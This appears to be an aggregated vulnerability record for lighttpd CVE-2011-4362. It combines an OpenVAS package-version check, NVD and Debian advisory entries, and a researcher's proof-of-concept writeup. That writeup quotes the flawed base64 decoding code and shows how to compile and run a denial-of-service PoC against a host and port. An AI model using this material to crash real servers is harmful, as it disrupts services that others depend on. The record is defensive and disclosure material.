ID OPENVAS:1361412562310864513 Type openvas Reporter Copyright (c) 2012 Greenbone Networks GmbH Modified 2019-03-15T00:00:00
Description
The remote host is missing an update for the 'lighttpd' package(s) announced via the referenced advisory.
###############################################################################
# OpenVAS Vulnerability Test
#
# Fedora Update for lighttpd FEDORA-2012-9040
#
# Authors:
# System Generated Check
#
# Copyright:
# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
# Registration (description) phase: when the scanner loads the plugin with
# `description` set, only metadata is registered and the script exits before
# any host interaction. The tags below are read by the feed tooling as-is.
if(description)
{
# Vendor advisory this check is derived from.
script_xref(name:"URL", value:"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/082765.html");
# Unique plugin identifier (last arc matches the FEDORA script family numbering).
script_oid("1.3.6.1.4.1.25623.1.0.864513");
script_version("$Revision: 14223 $");
script_tag(name:"last_modification", value:"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $");
script_tag(name:"creation_date", value:"2012-08-30 10:35:35 +0530 (Thu, 30 Aug 2012)");
# Single CVE covered: base64 signedness issue in lighttpd's HTTP auth decoding.
script_cve_id("CVE-2011-4362");
# CVSSv2 as published: network-reachable, no auth, availability impact only.
script_tag(name:"cvss_base", value:"5.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:N/A:P");
script_xref(name:"FEDORA", value:"2012-9040");
script_name("Fedora Update for lighttpd FEDORA-2012-9040");
script_tag(name:"summary", value:"The remote host is missing an update for the 'lighttpd'
package(s) announced via the referenced advisory.");
# Passive category: gathers installed-package data, never sends attack traffic.
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
script_family("Fedora Local Security Checks");
# Relies on the package inventory collected over SSH by this dependency.
script_dependencies("gather-package-list.nasl");
# Only schedule the check when an SSH login produced a Fedora 17 package list.
script_mandatory_keys("ssh/login/fedora", "ssh/login/rpms", re:"ssh/login/release=FC17");
script_tag(name:"affected", value:"lighttpd on Fedora 17");
script_tag(name:"solution", value:"Please install the updated package(s).");
# QoD "package": the result is a version comparison of the installed RPM,
# not a confirmation that the flaw is reachable at runtime.
script_tag(name:"qod_type", value:"package");
script_tag(name:"solution_type", value:"VendorFix");
exit(0);
}
include("revisions-lib.inc");
include("pkg-lib-rpm.inc");

# Detection phase. The release string comes from the package list gathered
# over SSH; without it there is nothing to compare against, so stop silently.
release = rpm_get_ssh_release();
if(!release)
  exit(0);

res = "";

# Defensive re-check of the release even though the mandatory-key regex in
# the description block already restricts scheduling to FC17 hosts.
if(release == "FC17")
{
  # Compare the installed lighttpd RPM against the fixed build from the
  # advisory. A non-NULL result is the report text describing the mismatch.
  res = isrpmvuln(pkg:"lighttpd", rpm:"lighttpd~1.4.31~1.fc17", rls:"FC17");
  if(res != NULL)
  {
    security_message(data:res);
    exit(0);
  }

  # __pkg_match is set by the rpm library when the package was present but
  # not below the fixed version; exit code 99 signals "installed, not vulnerable".
  if(__pkg_match)
    exit(99);

  exit(0);
}
{"id": "OPENVAS:1361412562310864513", "type": "openvas", "bulletinFamily": "scanner", "title": "Fedora Update for lighttpd FEDORA-2012-9040", "description": "The remote host is missing an update for the ", "published": "2012-08-30T00:00:00", "modified": "2019-03-15T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864513", "reporter": "Copyright (c) 2012 Greenbone Networks GmbH", "references": ["http://lists.fedoraproject.org/pipermail/package-announce/2012-June/082765.html", "2012-9040"], "cvelist": ["CVE-2011-4362"], "lastseen": "2019-05-29T18:38:46", "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-4362"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12116", "SECURITYVULNS:DOC:27485", "SECURITYVULNS:DOC:27504"]}, {"type": "seebug", "idList": ["SSV:72453", "SSV:26120", "SSV:30003", "SSV:24275"]}, {"type": "amazon", "idList": ["ALAS-2012-107"]}, {"type": "openvas", "idList": ["OPENVAS:864513", "OPENVAS:864498", "OPENVAS:1361412562310120270", "OPENVAS:1361412562310864498", "OPENVAS:1361412562310121213", "OPENVAS:136141256231070584", "OPENVAS:70687", "OPENVAS:70584", "OPENVAS:136141256231070687"]}, {"type": "exploitdb", "idList": ["EDB-ID:18295"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:184DA427E35F6E3E6D5AC9CCCC72148E"]}, {"type": "freebsd", "idList": ["C6521B04-314B-11E1-9CF4-5404A67EEF98"]}, {"type": "nessus", "idList": ["OPENSUSE-2012-110.NASL", "ALA_ALAS-2012-107.NASL", "FEDORA_2012-9078.NASL", "GENTOO_GLSA-201406-10.NASL", "LIGHTTPD_1_4_30.NASL", "FEDORA_2012-9040.NASL", "DEBIAN_DSA-2368.NASL", "FREEBSD_PKG_C6521B04314B11E19CF45404A67EEF98.NASL", "SUSE_11_4_LIGHTTPD-120130.NASL", "SOLARIS11_LIGHTTPD_20120417.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-17319"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2381-:320B8", "DEBIAN:DSA-2368-1:91542"]}, {"type": "gentoo", "idList": ["GLSA-201406-10"]}], 
"modified": "2019-05-29T18:38:46", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2019-05-29T18:38:46", "rev": 2}, "vulnersScore": 5.8}, "pluginID": "1361412562310864513", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for lighttpd FEDORA-2012-9040\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/082765.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864513\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-30 10:35:35 +0530 (Thu, 30 Aug 2012)\");\n script_cve_id(\"CVE-2011-4362\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name:\"FEDORA\", value:\"2012-9040\");\n script_name(\"Fedora Update for lighttpd FEDORA-2012-9040\");\n script_tag(name:\"summary\", 
value:\"The remote host is missing an update for the 'lighttpd'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"lighttpd on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"lighttpd\", rpm:\"lighttpd~1.4.31~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "naslFamily": "Fedora Local Security Checks"}
{"cve": [{"lastseen": "2020-12-09T19:39:12", "description": "Integer signedness error in the base64_decode function in the HTTP authentication functionality (http_auth.c) in lighttpd 1.4 before 1.4.30 and 1.5 before SVN revision 2806 allows remote attackers to cause a denial of service (segmentation fault) via crafted base64 input that triggers an out-of-bounds read with a negative index.", "edition": 5, "cvss3": {}, "published": "2011-12-24T19:55:00", "title": "CVE-2011-4362", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4362"], "modified": "2018-11-29T14:38:00", "cpe": ["cpe:/o:debian:debian_linux:6.0", "cpe:/a:lighttpd:lighttpd:1.5.0", "cpe:/o:debian:debian_linux:5.0", "cpe:/o:debian:debian_linux:7.0"], "id": "CVE-2011-4362", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4362", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:lighttpd:lighttpd:1.5.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:5.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*"]}], "securityvulns": [{"lastseen": "2018-08-31T11:10:43", "bulletinFamily": "software", "cvelist": ["CVE-2011-4362"], "description": "29 of November 2011 was the date of public disclosure interesting\r\nvulnerability in lighttpd server. Xi Wang discovered that mod_auth\r\nfor this server does not propely decode characters from the extended\r\nASCII table. 
The vulnerable code is below:\r\n\r\n\r\n"src/http_auth.c:67"\r\n--- CUT ---\r\nstatic const short base64_reverse_table[256] = ...;\r\nstatic unsigned char * base64_decode(buffer *out, const char *in) {\r\n ...\r\n int ch, ...;\r\n size_t i;\r\n ...\r\n \r\n ch = in[i];\r\n ...\r\n ch = base64_reverse_table[ch];\r\n ...\r\n}\r\n--- CUT ---\r\n\r\nBecause variable 'in' is type 'char', characters above 0x80 lead to negative indices.\r\nThis vulnerability may lead out-of-boud read and theoretically cause Segmentation Fault (Denial of Service attack).\r\nUnfortunately I couldn't find any binaries where .rodata section before the base64_reverse_table\r\ntable cause this situation.\r\n\r\nI have added some extra debug in the lighttpd source code to see if this vulnerability is\r\nexecuted correctly. Here is output for one of the example:\r\n\r\n--- CUT ---\r\nptr[0x9a92c48] size[0xc0] used[0x0]\r\n127(. | 0 | 0)\r\n-128(t | 1 | 0)\r\n-127(e | 2 | 1)\r\n-126(' | 3 | 2)\r\n-125(e | 4 | 3)\r\n-124(u | 5 | 3)\r\n-123(r | 6 | 4)\r\n-122(' | 7 | 5)\r\n-121(s | 8 | 6)\r\n-120(c | 9 | 6)\r\n-119(i | 10 | 7)\r\n-118(n | 11 | 8)\r\n-117(i | 12 | 9)\r\n-116( | 13 | 9)\r\n-115(a | 14 | 10)\r\n-114(t | 15 | 11)\r\n-113(. | 16 | 12)\r\n-112(e | 17 | 12)\r\n-111(u | 18 | 13)\r\n-110(r | 19 | 14)\r\n-109(' | 20 | 15)\r\n-108(f | 21 | 15)\r\n-107(i | 22 | 16)\r\n-106(e | 23 | 17)\r\n-105(: | 24 | 18)\r\n-104(= | 25 | 18)\r\n-103(o | 26 | 19)\r\n-102(t | 27 | 20)\r\n-101(o | 28 | 21)\r\n-100( | 29 | 21)\r\n-99(a | 30 | 22)\r\n-98(g | 31 | 23)\r\n-97(. 
| 32 | 24)\r\n-96(d | 33 | 24)\r\n-95(g | 34 | 25)\r\n-94(s | 35 | 26)\r\n-93(: | 36 | 27)\r\n-92(u | 37 | 27)\r\n-91(s | 38 | 28)\r\n-90(p | 39 | 29)\r\n-89(o | 40 | 30)\r\n-88(t | 41 | 30)\r\n-87(d | 42 | 31)\r\n-86(b | 43 | 32)\r\n-85(c | 44 | 33)\r\n-84(e | 45 | 33)\r\n-83(d | 46 | 34)\r\n-82(( | 47 | 35)\r\n-81(n | 48 | 36)\r\n-80(y | 49 | 36)\r\n-79(h | 50 | 37)\r\n-78(d | 51 | 38)\r\n-77(g | 52 | 39)\r\n-76(s | 53 | 39)\r\n-75( | 54 | 40)\r\n-74(r | 55 | 41)\r\n-73(p | 56 | 42)\r\n-72(a | 57 | 42)\r\n-71(n | 58 | 43)\r\n-70(. | 59 | 44)\r\n-69(. | 60 | 45)\r\n-68(d | 61 | 45)\r\n-67(g | 62 | 46)\r\n-66(s | 63 | 47)\r\n-65(: | 64 | 48)\r\n-64(( | 65 | 48)\r\n-63(d | 66 | 49)\r\n-62(- | 67 | 50)\r\n-61(e | 68 | 51)\r\n-60(s | 69 | 51)\r\n-59( | 70 | 52)\r\n-58(i | 71 | 53)\r\n-57(s | 72 | 54)\r\n-56(n | 73 | 54)\r\n-55( | 74 | 55)\r\n-54(i | 75 | 56)\r\n-53(l | 76 | 57)\r\n-52(. | 77 | 57)\r\n-51(. | 78 | 58)\r\n-50(k | 79 | 59)\r\n-49(0 | 80 | 60)\r\n-48(% | 81 | 60)\r\n-47(] | 82 | 61)\r\n-46(p | 83 | 62)\r\n-45(r | 84 | 63)\r\n-44(0 | 85 | 63)\r\n-43(% | 86 | 64)\r\n-42(] | 87 | 65)\r\n-41(s | 88 | 66)\r\n-40(z | 89 | 66)\r\n-39([ | 90 | 67)\r\n-38(x | 91 | 68)\r\n-37(x | 92 | 69)\r\n-36( | 93 | 69)\r\n-35(s | 94 | 70)\r\n-34(d | 95 | 71)\r\n-33(0 | 96 | 72)\r\n-32(% | 97 | 72)\r\n-31(] | 98 | 73)\r\n-30(. | 99 | 74)\r\n-29(. | 100 | 75)\r\n-28(d | 101 | 75)\r\n-27(c | 102 | 76)\r\n-26(d | 103 | 77)\r\n-25(i | 104 | 78)\r\n-24(g | 105 | 78)\r\n-23(b | 106 | 79)\r\n-22(s | 107 | 80)\r\n-21(6 | 108 | 81)\r\n-20(- | 109 | 81)\r\n-19(t | 110 | 82)\r\n-18(i | 111 | 83)\r\n-17(g | 112 | 84)\r\n-16(f | 113 | 84)\r\n-15(i | 114 | 85)\r\n-14(e | 115 | 86)\r\n-13(. | 116 | 87)\r\n-12(. | 117 | 87)\r\n-11(. | 118 | 88)\r\n-10(. | 119 | 89)\r\n-9(. | 120 | 90)\r\n-8(. | 121 | 90)\r\n-7(. | 122 | 91)\r\n-6(. | 123 | 92)\r\n-5(. | 124 | 93)\r\n-4(. | 125 | 93)\r\n-3(. | 126 | 94)\r\n-2(. | 127 | 95)\r\n-1(. 
| 128 | 96)\r\nk[0x60] ptr[0x9a92c48] size[0xc0] used[0x0]\r\nptr[0x9a92c48] size[0xc0] used[0x60]\r\nstring [.Yg.\...n.Xt.]r.ze.....g.Y..\..Yb.Y(..d..r.[..Y...-.xi..i.]\r\n--- CUT ---\r\n\r\nFirst column is the offset so vulnerability is executed like it should be\r\n(negative offsets). Second column is byte which is read out-of-bound.\r\n\r\nHow to run this very primitive Proof of Concept?\r\n\r\n$ gcc p_cve-2011-4362.c -o p_cve-2011-4362\r\n$ ./p_cve-2011-4362 \r\n\r\n ...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\r\n\r\n Usage: ./p_cve-2011-4362 <options>\r\n\r\n Options:\r\n -v <victim>\r\n -p <port>\r\n -d <remote_dir_for_auth>\r\n\r\n$ ./p_cve-2011-4362 -h 127.0.0.1 -p 81 -d dupa\r\n\r\n ...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\r\n\r\n [+] Preparing arguments... OK\r\n [+] Creating socket... OK\r\n [+] Connecting to [127.0.0.1]... OK\r\n [+] Sending dirty packet... OK\r\n\r\n [+] Check the website!\r\n\r\n$ \r\n\r\nLighttpd will log this situation probably in error-log file like this:\r\n\r\n--- CUT ---\r\n.\r\n.\r\n2011-12-xx xx:xx:11: (http_auth.c.887) : is missing in \u0417Yg\\u00a7\u041e\u044an\u0446Xt\u0455]rze\u043b\u042b\u0444\u0455gY\u0443\u043f\\u0440\u044fYb\u043eY(\u0457d\u042f\u0448r\u0426[Y\u0443\u044a\u0429-\u00b7xi\u044e\u0438i\u00b0k\u0412Wp\u041b\t]߶\u0448\u0442\\u0434\u0412\u0427@V\u0428\u0434\u00a6x\u0443\u044a\u042dize \r\n--- CUT ---\r\n\r\nMaybe you can find vulnerable binary?\r\n\r\nBest regards,\r\nAdam 'pi3' Zabrocki\r\n\r\n\r\n--\r\nhttp://pi3.com.pl\r\nhttp://site.pi3.com.pl/exp/p_cve-2011-4362.c\r\nhttp://blog.pi3.com.pl/?p=277\r\n", "edition": 1, "modified": "2012-01-02T00:00:00", "published": "2012-01-02T00:00:00", "id": "SECURITYVULNS:DOC:27504", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27504", "title": "Lighttpd Proof of Concept code for CVE-2011-4362", "type": "securityvulns", "cvss": {"score": 5.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:43", "bulletinFamily": "software", "cvelist": ["CVE-2011-3389", "CVE-2011-4362"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- ---------------------------------------------------------------------------\r\nDebian Security Advisory DSA-2368-1 security@debian.org\r\nhttp://www.debian.org/security/ Nico Golde\r\nDec 20th, 2011 http://www.debian.org/security/faq\r\n- ---------------------------------------------------------------------------\r\n\r\nPackage : lighttpd\r\nVulnerability : multiple\r\nProblem type : remote\r\nDebian-specific: no\r\nDebian bug : 652726\r\nCVE IDs : CVE-2011-4362 CVE-2011-3389\r\n\r\nSeveral vulnerabilities have been discovered in lighttpd, a small and fast\r\nwebserver with minimal memory footprint.\r\n\r\nCVE-2011-4362\r\n\r\n Xi Wang discovered that the base64 decoding routine which is used to\r\n decode user input during an HTTP authentication, suffers of a signedness\r\n issue when processing user input. As a result it is possible to force\r\n lighttpd to perform an out-of-bounds read which results in Denial of\r\n Service conditions.\r\n\r\nCVE-2011-3389\r\n\r\n When using CBC ciphers on an SSL enabled virtual host to communicate with\r\n certain client, a so called "BEAST" attack allows man-in-the-middle\r\n attackers to obtain plaintext HTTP traffic via a blockwise\r\n chosen-boundary attack (BCBA) on an HTTPS session. Technically this is\r\n no lighttpd vulnerability. However, lighttpd offers a workaround to\r\n mitigate this problem by providing a possibility to disable CBC ciphers.\r\n\r\n This updates includes this option by default. 
System administrators\r\n are advised to read the NEWS file of this update (as this may break older\r\n clients).\r\n\r\n\r\nFor the oldstable distribution (lenny), this problem has been fixed in\r\nversion 1.4.19+lenny3.\r\n\r\nFor the stable distribution (squeeze), this problem has been fixed in\r\nversion 1.4.28-2+squeeze1.\r\n\r\nFor the testing distribution (squeeze), this problem will be fixed soon.\r\n\r\nFor the unstable distribution (sid), this problem has been fixed in\r\nversion 1.4.30-1.\r\n\r\n\r\nWe recommend that you upgrade your lighttpd packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: http://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.11 (GNU/Linux)\r\n\r\niEYEARECAAYFAk7xJ1MACgkQHYflSXNkfP+N5ACgtImneTJSdyEiCLnWTFA0uxzz\r\nqP0An07LJwL5K3NmrMRfKeCVpigpn1zR\r\n=QU3k\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2011-12-26T00:00:00", "published": "2011-12-26T00:00:00", "id": "SECURITYVULNS:DOC:27485", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27485", "title": "[SECURITY] [DSA 2368-1] lighttpd security update", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:45", "bulletinFamily": "software", "cvelist": ["CVE-2011-3389", "CVE-2011-4362"], "description": "DoS on base64 parsing.", "edition": 1, "modified": "2012-01-02T00:00:00", "published": "2012-01-02T00:00:00", "id": "SECURITYVULNS:VULN:12116", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12116", "title": "lighthttpd security vulnerabilities", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "seebug": [{"lastseen": "2017-11-19T17:55:59", "description": "No description 
provided by source.", "published": "2012-01-02T00:00:00", "type": "seebug", "title": "Lighttpd Proof of Concept code for CVE-2011-4362", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4362"], "modified": "2012-01-02T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-30003", "id": "SSV:30003", "sourceData": "\n 29 of November 2011 was the date of public disclosure interesting\r\nvulnerability in lighttpd server. Xi Wang discovered that mod_auth\r\nfor this server does not propely decode characters from the extended\r\nASCII table. The vulnerable code is below:\r\n \r\n \r\n"src/http_auth.c:67"\r\n--- CUT ---\r\nstatic const short base64_reverse_table[256] = ...;\r\nstatic unsigned char * base64_decode(buffer *out, const char *in) {\r\n ...\r\n int ch, ...;\r\n size_t i;\r\n ...\r\n \r\n ch = in[i];\r\n ...\r\n ch = base64_reverse_table[ch];\r\n ...\r\n}\r\n--- CUT ---\r\n \r\nBecause variable 'in' is type 'char', characters above 0x80 lead to\r\nnegative indices.\r\nThis vulnerability may lead out-of-boud read and theoretically cause\r\nSegmentation Fault (Denial of Service attack).\r\nUnfortunately I couldn't find any binaries where .rodata section before\r\nthe base64_reverse_table\r\ntable cause this situation.\r\n \r\nI have added some extra debug in the lighttpd source code to see if this\r\nvulnerability is\r\nexecuted correctly. Here is output for one of the example:\r\n \r\n--- CUT ---\r\nptr[0x9a92c48] size[0xc0] used[0x0]\r\n127(. | 0 | 0)\r\n-128(t | 1 | 0)\r\n-127(e | 2 | 1)\r\n-126(' | 3 | 2)\r\n-125(e | 4 | 3)\r\n-124(u | 5 | 3)\r\n-123(r | 6 | 4)\r\n-122(' | 7 | 5)\r\n-121(s | 8 | 6)\r\n-120(c | 9 | 6)\r\n-119(i | 10 | 7)\r\n-118(n | 11 | 8)\r\n-117(i | 12 | 9)\r\n-116( | 13 | 9)\r\n-115(a | 14 | 10)\r\n-114(t | 15 | 11)\r\n-113(. 
| 16 | 12)\r\n-112(e | 17 | 12)\r\n-111(u | 18 | 13)\r\n-110(r | 19 | 14)\r\n-109(' | 20 | 15)\r\n-108(f | 21 | 15)\r\n-107(i | 22 | 16)\r\n-106(e | 23 | 17)\r\n-105(: | 24 | 18)\r\n-104(= | 25 | 18)\r\n-103(o | 26 | 19)\r\n-102(t | 27 | 20)\r\n-101(o | 28 | 21)\r\n-100( | 29 | 21)\r\n-99(a | 30 | 22)\r\n-98(g | 31 | 23)\r\n-97(. | 32 | 24)\r\n-96(d | 33 | 24)\r\n-95(g | 34 | 25)\r\n-94(s | 35 | 26)\r\n-93(: | 36 | 27)\r\n-92(u | 37 | 27)\r\n-91(s | 38 | 28)\r\n-90(p | 39 | 29)\r\n-89(o | 40 | 30)\r\n-88(t | 41 | 30)\r\n-87(d | 42 | 31)\r\n-86(b | 43 | 32)\r\n-85(c | 44 | 33)\r\n-84(e | 45 | 33)\r\n-83(d | 46 | 34)\r\n-82(( | 47 | 35)\r\n-81(n | 48 | 36)\r\n-80(y | 49 | 36)\r\n-79(h | 50 | 37)\r\n-78(d | 51 | 38)\r\n-77(g | 52 | 39)\r\n-76(s | 53 | 39)\r\n-75( | 54 | 40)\r\n-74(r | 55 | 41)\r\n-73(p | 56 | 42)\r\n-72(a | 57 | 42)\r\n-71(n | 58 | 43)\r\n-70(. | 59 | 44)\r\n-69(. | 60 | 45)\r\n-68(d | 61 | 45)\r\n-67(g | 62 | 46)\r\n-66(s | 63 | 47)\r\n-65(: | 64 | 48)\r\n-64(( | 65 | 48)\r\n-63(d | 66 | 49)\r\n-62(- | 67 | 50)\r\n-61(e | 68 | 51)\r\n-60(s | 69 | 51)\r\n-59( | 70 | 52)\r\n-58(i | 71 | 53)\r\n-57(s | 72 | 54)\r\n-56(n | 73 | 54)\r\n-55( | 74 | 55)\r\n-54(i | 75 | 56)\r\n-53(l | 76 | 57)\r\n-52(. | 77 | 57)\r\n-51(. | 78 | 58)\r\n-50(k | 79 | 59)\r\n-49(0 | 80 | 60)\r\n-48(% | 81 | 60)\r\n-47(] | 82 | 61)\r\n-46(p | 83 | 62)\r\n-45(r | 84 | 63)\r\n-44(0 | 85 | 63)\r\n-43(% | 86 | 64)\r\n-42(] | 87 | 65)\r\n-41(s | 88 | 66)\r\n-40(z | 89 | 66)\r\n-39([ | 90 | 67)\r\n-38(x | 91 | 68)\r\n-37(x | 92 | 69)\r\n-36( | 93 | 69)\r\n-35(s | 94 | 70)\r\n-34(d | 95 | 71)\r\n-33(0 | 96 | 72)\r\n-32(% | 97 | 72)\r\n-31(] | 98 | 73)\r\n-30(. | 99 | 74)\r\n-29(. 
| 100 | 75)\r\n-28(d | 101 | 75)\r\n-27(c | 102 | 76)\r\n-26(d | 103 | 77)\r\n-25(i | 104 | 78)\r\n-24(g | 105 | 78)\r\n-23(b | 106 | 79)\r\n-22(s | 107 | 80)\r\n-21(6 | 108 | 81)\r\n-20(- | 109 | 81)\r\n-19(t | 110 | 82)\r\n-18(i | 111 | 83)\r\n-17(g | 112 | 84)\r\n-16(f | 113 | 84)\r\n-15(i | 114 | 85)\r\n-14(e | 115 | 86)\r\n-13(. | 116 | 87)\r\n-12(. | 117 | 87)\r\n-11(. | 118 | 88)\r\n-10(. | 119 | 89)\r\n-9(. | 120 | 90)\r\n-8(. | 121 | 90)\r\n-7(. | 122 | 91)\r\n-6(. | 123 | 92)\r\n-5(. | 124 | 93)\r\n-4(. | 125 | 93)\r\n-3(. | 126 | 94)\r\n-2(. | 127 | 95)\r\n-1(. | 128 | 96)\r\nk[0x60] ptr[0x9a92c48] size[0xc0] used[0x0]\r\nptr[0x9a92c48] size[0xc0] used[0x60]\r\nstring [.Yg.\\...n.Xt.]r.ze.....g.Y..\\..Yb.Y(..d..r.[..Y...-.xi..i.]\r\n--- CUT ---\r\n \r\nFirst column is the offset so vulnerability is executed like it should be\r\n(negative offsets). Second column is byte which is read out-of-bound.\r\n \r\nHow to run this very primitive Proof of Concept?\r\n \r\n$ gcc p_cve-2011-4362.c -o p_cve-2011-4362\r\n$ ./p_cve-2011-4362\r\n \r\n ...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki)\r\n]=- :::...\r\n \r\n Usage: ./p_cve-2011-4362 <options>\r\n \r\n Options:\r\n -v <victim>\r\n -p <port>\r\n -d <remote_dir_for_auth>\r\n \r\n$ ./p_cve-2011-4362 -h 127.0.0.1 -p 81 -d dupa\r\n \r\n ...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki)\r\n]=- :::...\r\n \r\n [+] Preparing arguments... OK\r\n [+] Creating socket... OK\r\n [+] Connecting to [127.0.0.1]... OK\r\n [+] Sending dirty packet... 
OK\r\n \r\n [+] Check the website!\r\n \r\n$\r\n \r\nLighttpd will log this situation probably in error-log file like this:\r\n \r\n--- CUT ---\r\n..\r\n..\r\n2011-12-xx xx:xx:11: (http_auth.c.887) : is missing in\r\n\ufffdYg\\\ufffd\ufffd\ufffdn\ufffdXt\ufffd]rze\ufffd\ufffd\ufffdgY\ufffd\ufffd\\\ufffd\ufffdYb\ufffdY(\ufffdd\ufffd\ufffdr\ufffd[Y\ufffd\ufffd\ufffd-\ufffdxi\ufffd\ufffdi\ufffdk\ufffdWp\ufffd ]\u07f6\ufffd\ufffd\\\ufffd\ufffd\ufffd@V\ufffd\ufffdx\ufffd\ufffd\ufffdize\r\n \r\n--- CUT ---\r\n \r\nMaybe you can find vulnerable binary?\r\n \r\nBest regards,\r\nAdam 'pi3' Zabrocki\r\n \r\n \r\n--\r\nhttp://pi3.com.pl\r\nhttp://www.exploit-db.com/sploits/p_cve-2011-4362.c\r\nhttp://blog.pi3.com.pl/?p=277\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-30003", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-11-19T18:02:45", "description": 